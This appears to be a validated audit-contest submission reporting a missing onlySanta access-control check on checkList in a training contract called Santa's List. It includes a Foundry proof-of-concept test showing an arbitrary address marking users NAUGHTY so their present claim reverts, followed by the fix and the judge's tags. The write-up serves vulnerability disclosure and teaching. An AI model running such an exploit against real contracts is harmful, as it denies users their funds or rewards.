First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

onlySanta modifier is not set on ```checkList``` function

DeFiesta

Summary

onlySanta modifier is not set on checkList function. Therefore, any user can update s_theListCheckedOnce for any user.

Vulnerability Details

A malicious entity could set every user to NAUGHTY which would cause a DoS since no user would be able to claim its present. Moreover, checkTwice function would always revert.

Impact

The system is susceptible to a Denial of Service (DoS) incident, potentially resulting in users not receiving their Christmas present :'(

Proof of Concept

function testCheckListAttack() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
assertEq(uint256(santasList.getNaughtyOrNiceTwice(user)), uint256(SantasList.Status.NICE));
vm.stopPrank();
vm.startPrank(MaliciousUser);
santasList.checkList(user, SantasList.Status.NAUGHTY);
assertEq(uint256(santasList.getNaughtyOrNiceOnce(user)), uint256(SantasList.Status.NAUGHTY));
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
vm.expectRevert();
santasList.collectPresent();
vm.stopPrank();
}

Tools Used

Manual review

Recommendations

I recommend putting onlySanta modifier on checkListfunction

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.